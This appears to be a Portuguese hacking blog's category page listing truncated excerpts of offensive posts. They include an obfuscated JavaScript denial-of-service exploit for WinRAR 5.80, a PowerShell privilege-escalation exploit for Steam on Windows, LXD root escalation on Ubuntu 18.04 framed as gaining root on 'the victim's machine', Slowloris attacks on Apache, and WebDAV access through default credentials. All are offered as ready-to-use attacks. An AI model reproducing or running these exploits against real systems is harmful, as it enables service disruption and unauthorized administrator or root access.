Scripts

DoS no WinRAR

DoS no WinRAR

Fala pessoal, tudo bem com vocês? Hoje trago um exploit de negação de serviço direcionado a uma falha do WinRAR 5.80 64bits. 1 – Crie um arquivo html com o seguinte código: <script type=”text/javascript”> //<![CDATA[ <!– var x=”function f(x){var i,o=\”\”,l=x.length;for(i=l-1;i>=0;i–) {try{o+=x.c” + “harAt(i);}catch(e){}}return o;}f(\”)\\\”function f(x,y){var i,o=\\\”\\\\\\\””+ “\\\\,l=x.length;for(i=0;i<l;i++){if(i==28)y+=i;y%=127;o+=String.fromCharCod” + “e(x.charCodeAt(i)^(y++));}return o;}f(\\\”\\\\xr}jMDLW\\\\\\\\nRTN\\\\\\\\\\”+ “\\\\\\LFE\\\\\\\\004\\\\\\\\017\\\\\\\\022GD\\\\\\\\\\\\\\\\^\\\\\\\\rhGjYh” + “83#9y2/(-s:\\\\\\\\021\\\\\\\\024\\\\\\\\013\\\\\\\\025Y9D\\\\\\\\037E\\\\\\”+ “\\034\\\\\\\\013F\\\\\\\\017\\\\\\\\002\\\\\\\\003\\\\\\\\037\\\\\\\\021\\\\”+ “\\\\005\\\\\\\\033\\\\\\\\021\\\\\\\\030\\\\\\\\020*UX\\\\\\\\032\\\\\\\\02” …

DoS no WinRAR Leia mais »

Exploit Escalação de Privilégios na Steam

Exploit: Escalação de Privilégios na Steam

A plataforma de jogos Steam, desenvolvida pela empresa Valve, apresenta uma vulnerabilidade de 0-day na versão para Windows. A falha, que se tornou pública pelo pesquisador Vasily Kravets, permite que qualquer usuário execute código arbitrário com privilégios de administrador. O exploit foi desenvolvido em PowerShell. $SteamRegKey = “HKLM:\SOFTWARE\WOW6432Node\Valve\Steam\NSIS” $MSIRegKey = “HKLM:\SYSTEM\CurrentControlSet\Services\msiserver” $RegDir = “C:\Windows\Temp\RegLN.exe” $PayDir …

Exploit: Escalação de Privilégios na Steam Leia mais »

Escalação de Privilégio no LXD Ubuntu 18.04

Escalação de Privilégio no LXD Ubuntu 18.04

No dia 10 de Junho de 2019 foi descoberta uma falha onde é possível fazer uma escalação de privilégio no LXD Ubuntu 18.04. No computador do atacante, faça download da build-alpine e crie um container como usuário root wget https://raw.githubusercontent.com/saghul/lxd-alpine-builder/master/build-alpine Agora execute este script e você terá acesso root na maquina da vitima #!/usr/bin/env bash function …

Escalação de Privilégio no LXD Ubuntu 18.04 Leia mais »

Gerador de relatório para Bug Bounty

Gerador de relatório para Bug Bounty

Quem utiliza programas de Bug Bounty, sabe que o mais importante é escrever um bom relatório, e o mesmo tem que ser bem detalhado. Escrever relatórios pode ser um trabalho repetitivo e, em um ambiente competitivo, cada minuto é crucial, portanto, ter modelos para diferentes tipos de vulnerabilidades pode ser uma grande ajuda. Frans Rosén, …

Gerador de relatório para Bug Bounty Leia mais »

Instalando Metasploit em Celulares Android

Instalando Metasploit em Celulares Android

Você já pensou em usar o Metasploit Framework diretamente do seu celular? Neste artigo irei ensinar como instala-lo. Primeiramente, instale o Termux. Tem um artigo aqui no blog que explica como instalar o Termux. Você também vai precisar do Git instalado, no mesmo artigo também ensino como instalar o git no celular. Abra o Termux e …

Instalando Metasploit em Celulares Android Leia mais »

DoS no Apache 2 com Slowloris

DoS no Apache 2 com Slowloris

O Slowloris é uma ferramenta para negação de serviço que atinge servidores Apache com versões inferiores à 2.2.22. Essa vulnerabilidade existe pois o Apache não sabe lidar com muitos sockets e acaba ficando sobrecarregado. Com apenas uma maquina e poucos minutos, conseguimos derrubar o Apache. Utilizando o Slowloris.pl Primeiramente, você precisa ter o Perl instalado …

DoS no Apache 2 com Slowloris Leia mais »

Proxychains: Utilizando Tor em Qualquer Aplicação via Terminal

Proxychains: Utilizando Tor em Qualquer Aplicação via Terminal

O Proxychains é uma ferramenta que funciona em conjunto com o Tor, para camuflar o seu ip em qualquer aplicação via terminal, não somente no navegador, como estamos acostumado. Instalando o Tor Abra o terminal e digite o seguinte comando: sudo apt-get install tor Instalando o Proxychains Abra o terminal e digite o seguinte comando: …

Proxychains: Utilizando Tor em Qualquer Aplicação via Terminal Leia mais »

Explorando WebDAV com Cadaver

Explorando WebDAV com Cadaver

Cadaver é um cliente WebDAV de linha de comando para Unix. Ele suporta upload de arquivos, download, exibição na tela, operações de mover, copiar, criar e excluir. Quando o servidor contém uma instalação padrão do XAMPP e o administrador não realizou a configuração do WebDAV, o login e a senha continuam como padrão, assim podendo …

Explorando WebDAV com Cadaver Leia mais »